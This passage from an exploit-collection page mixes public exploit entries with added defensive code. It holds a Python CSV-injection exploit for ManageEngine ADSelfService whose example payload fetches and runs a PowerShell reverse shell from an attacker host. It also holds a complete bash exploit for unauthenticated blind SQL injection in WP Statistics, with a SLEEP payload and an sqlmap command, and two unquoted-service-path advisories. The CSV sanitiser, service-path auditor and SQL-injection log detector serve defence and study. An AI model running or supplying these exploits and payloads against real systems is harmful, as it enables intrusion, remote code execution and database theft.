    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    gUrl = "https://" + target + "/authorization.do"
    getCsrf = requests.get(url=gUrl, allow_redirects=False, verify=False)
    csrfToken = getCsrf.cookies['_zcsr_tmp']
    print("[*] Csrf token: %s" % csrfToken)
    # pass the token string itself, not the whole Response object
    loginReq(target, payload, csrfToken)


def main(args):
    if len(args) != 3:
        print("usage: %s targetIp:port payload" % (args[0]))
        print("Example: python3 adSelfServiceCsv.py 192.168.1.253:9251 \"=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0\"")
        sys.exit(1)
    getCsrfToken(target=args[1], payload=args[2])


if __name__ == "__main__":
    main(args=sys.argv)
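The defence against the CSV injection described above sits in the export path, not the login form: any cell that begins with a formula trigger must be written so the spreadsheet treats it as text. The following Python is an added example written for this page, not code from ManageEngine or from the advisory author; the report rows, the column names and the helper names are constructed for the illustration.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
# Tab and CR are included because they are also interpreted at the start of a cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return a cell value that a spreadsheet will display as a literal string.

    A single quote is prefixed when the first non-space character is a formula
    trigger, so "=cmd|..." becomes "'=cmd|..." and is never evaluated.  Leading
    spaces are skipped before the check because "  =cmd" is still evaluated.
    Trade-off: negative numbers such as "-5" are neutralized too; export them
    from a numeric column separately if they must stay numeric.
    """
    if value is None:
        return ""
    text = str(value)
    first = text.lstrip(" ")[:1]
    if first in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_report(rows, fieldnames):
    """Write an audit-report style table to CSV text with every cell neutralized.

    QUOTE_ALL wraps each field in double quotes so that separators or quotes
    inside a value cannot spill into a neighbouring cell either.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL,
                            lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({name: neutralize_cell(row.get(name)) for name in fieldnames})
    return buf.getvalue()


if __name__ == "__main__":
    # constructed sample: one benign login attempt and one formula-looking user name
    sample_rows = [
        {"User Name": "alice", "Status": "Success"},
        {"User Name": "=1+1", "Status": "Failed"},
    ]
    print(export_report(sample_rows, ["User Name", "Status"]))
```

The check is applied at write time so it covers every column, including ones populated from untrusted input that the report code did not anticipate.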
# Exploit Title: ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path
# Date: 2020-05-19
# Exploit Author: Alejandra Sánchez
# Vendor Homepage: www.asus.com
# Version: 1.0.94.0
# Tested on: Windows 10 Pro x64 es

# Description:
ATK Hotkey 1.0.94.0 suffers from an unquoted search path issue impacting the service 'AsHidService'. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Prerequisites
Local, Non-privileged Local User with restart capabilities

# Details

C:\>wmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
ASUS HID Access Service    AsHidService    C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe    Auto

C:\>sc qc "AsHidService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: AsHidService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ASUS HID Access Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2020-11-26
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 1.2.3500.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Live Updater Service    Live Updater Service    C:\Program Files\Acer\Acer Updater\UpdaterService.exe    Auto

# Service info:

C:\>sc qc "Live Updater Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Live updater Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Acer\Acer Updater\UpdaterService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Live Updater Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

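Both the ASUS and the Acer advisories above are found the same way: a service whose BINARY_PATH_NAME is unquoted and contains spaces. The following Python is an added example for this page, not code from either advisory; it parses an `sc qc` dump (English labels, or the Spanish ones in the ASUS output) and lists the intermediate paths Windows would try before the real executable, which are exactly the locations whose directory permissions an administrator needs to review. The `sc qc` sample inside the block is constructed; `ExampleUpdater` and `Example Corp` are placeholders.

```python
import re


def unquoted_path_candidates(binary_path):
    """Return the executables Windows may try before the real one when a
    service's BINARY_PATH_NAME is unquoted and contains spaces.

    CreateProcess resolves an unquoted command line by testing each
    space-delimited prefix in turn, appending ".exe" when the prefix has no
    extension, so for
        C:\\Program Files\\Acer\\Acer Updater\\UpdaterService.exe
    it checks C:\\Program.exe, then C:\\Program Files\\Acer\\Acer.exe, and only
    then the real file.  Returns [] for a quoted or space-free path, or when
    the first prefix that ends in .exe is the real executable (arguments follow).
    """
    path = binary_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    words = path.split(" ")
    candidates = []
    for i in range(1, len(words)):
        prefix = " ".join(words[:i])
        if prefix.lower().endswith(".exe"):
            break  # reached the real executable; the remaining words are its arguments
        candidates.append(prefix + ".exe")
    return candidates


# Labels as printed by `sc qc` on an English and on a Spanish Windows (see the
# two advisories above); other fields of the dump are ignored.
_SC_FIELD = re.compile(
    r"^\s*(?P<label>SERVICE_NAME|NOMBRE_SERVICIO|BINARY_PATH_NAME|NOMBRE_RUTA_BINARIO)"
    r"\s*:\s*(?P<value>.*?)\s*$",
    re.MULTILINE,
)


def audit_sc_qc(output):
    """Parse one `sc qc <service>` dump and return (service_name, candidates).

    Returns None when the dump lacks a service name or a binary path.
    """
    fields = {}
    for m in _SC_FIELD.finditer(output):
        key = "name" if m.group("label") in ("SERVICE_NAME", "NOMBRE_SERVICIO") else "path"
        fields[key] = m.group("value")
    if "name" not in fields or "path" not in fields:
        return None
    return fields["name"], unquoted_path_candidates(fields["path"])


# Constructed sample dump (placeholder service and vendor names).
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ExampleUpdater
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files\\Example Corp\\Updater\\UpdaterService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Example Updater Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    name, candidates = audit_sc_qc(SAMPLE_SC_QC)
    print("Service:", name)
    for c in candidates:
        print("  Windows would try first:", c)
```

In a real audit the candidate list is fed to an ACL check (for example `icacls` on each parent directory); the fix on the vendor side is simply to register the service with a quoted path.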
# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
# Date: 20/05/2021
# Exploit Author: Mansoor R (@time4ster)
# CVSS Score: 7.5 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
# Version Affected: 13.0 to 13.0.7
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# Patch: Upgrade to wp-statistics 13.0.8 (or above)
# Tested On: wp-statistics 13.0.6,13.0.7

#!/bin/bash

# Credits:
# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/

# SQLmap Exploit for grepping database banner (automated):
# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --technique=T --dbms="mysql" -p "ID" -b

# WARNINGS:
# Only test the exploit on websites you are authorized to.
# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.

# Exploit
# ==============

echo
echo "============================================================================================"
echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
echo
echo "By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo

function printHelp() {
    echo -e "
Usage:
    -u|--wp-url <string>    Wordpress target url
    -k|--check              Only checks whether vulnerable version of plugin is running or not.
    -h|--help               Print Help menu

Example:
    ./wp-statistics-exploit.sh --wp-url https://www.example.com/wordpress
    ./wp-statistics-exploit.sh --wp-url https://www.example.com/wordpress --check
"
}

# Processing arguments
check="false"
exploit="true"

while [[ "$#" -gt 0 ]]
do
    key="$1"
    case "$key" in
        -u|--wp-url)
            wp_url="$2"
            shift
            shift # past argument
            ;;
        -k|--check)
            check="true"
            exploit="false"
            shift # flag only, no value to skip
            ;;
        -h|--help)
            printHelp
            exit
            ;;
        *)
            echo "[-] Enter valid options"
            exit
            ;;
    esac
done

[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit

function checkVersion() {
    url="$1"
    [[ -z "$url" ]] && return
    target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
    version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
    [[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version"
    [[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return
    vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
    is_vulnerable="false"
    for v in "${vuln_version[@]}"; do
        [[ "$version" == "$v" ]] && is_vulnerable="true" && break
    done
    [[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
    [[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is Not Vulnerable"
}

function exploitPlugin() {
    url="$1"
    target_endpoint="$url/wp-admin/admin.php"
    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
    sleep=3
    payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"
    echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
    read choice
    [[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return
    echo
    echo "[+] Trying Payload:"
    set -x
    curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
        --data-urlencode "page=wps_pages_page" \
        --data-urlencode "type=1" \
        --data-urlencode "$payload"
}

[[ "$check" == "true" ]] && checkVersion "$wp_url"
[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"
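Several entries on this page (the Billing Management System union payload, the Staff ID Card sqlmap output, the In4Suit tautology, and the WP Statistics SLEEP probe above) leave the same kind of trace in a web server's access log. The following Python is an added example written for this page, not code from any of the advisories; it scans Apache/Nginx combined-format log lines for the indicator families those payloads use and reports which family fired. The log lines, the pattern names and the function names are constructed for the illustration; POST bodies (where the In4Suit and Staff ID Card payloads travel) are not in an access log, so `classify` also accepts a raw body string from a WAF or application log.

```python
import re
from urllib.parse import unquote_plus

# Indicator families, applied to the URL-decoded, lower-cased request data.
# The family name is reported in the finding so an analyst can see why it fired.
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "time_based":   re.compile(r"\b(sleep|benchmark)\s*\("),
    "error_based":  re.compile(r"\b(floor\s*\(\s*rand|extractvalue|updatexml)\b"),
    "tautology":    re.compile(r"\b(or|and)\b\s+['\"]?\s*\d+\s*=\s*\d+"),
    "comment_tail": re.compile(r"(--\s|/\*)"),
}

# A trailing SQL comment on its own is too common in legitimate traffic to alert
# on; it only adds confidence when another family is present.
WEAK_INDICATORS = {"comment_tail"}


def classify(raw):
    """Return the sorted indicator names found in a query string or request body."""
    text = unquote_plus(raw).lower()
    return sorted(name for name, rx in SQLI_PATTERNS.items() if rx.search(text))


def is_suspicious(indicators):
    return any(name not in WEAK_INDICATORS for name in indicators)


# Combined log format; only the fields needed here are captured (constructed regex).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def scan_access_log(log_text):
    """Return one finding per request whose query string carries a strong SQLi indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        path, _, query = target.partition("?")
        if not query:
            continue
        indicators = classify(query)
        if is_suspicious(indicators):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": path, "indicators": indicators})
    return findings


# Constructed sample log: a SLEEP probe against the WP Statistics endpoint, a
# union-based request against editgroup.php, a normal request, and a benign
# search whose words happen to include "union" and "select".
SAMPLE_LOG = """\
10.0.0.5 - - [20/May/2021:10:01:02 +0000] "GET /wp-admin/admin.php?ID=1%20AND%20(SELECT%20*%20from%20(select%20SLEEP(3))a)&page=wps_pages_page&type=1 HTTP/1.1" 200 512
10.0.0.5 - - [20/May/2021:10:01:09 +0000] "GET /editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+ HTTP/1.1" 200 2048
192.168.1.20 - - [20/May/2021:10:02:00 +0000] "GET /editgroup.php?id=7 HTTP/1.1" 200 1800
192.168.1.21 - - [20/May/2021:10:02:30 +0000] "GET /search.php?q=union+station+select+board HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The `union_select` pattern insists on `union [all] select` as adjacent keywords so that ordinary text containing both words, as in the last sample line, is not flagged; the trade-off is that heavily obfuscated payloads need additional normalisation before the patterns are applied.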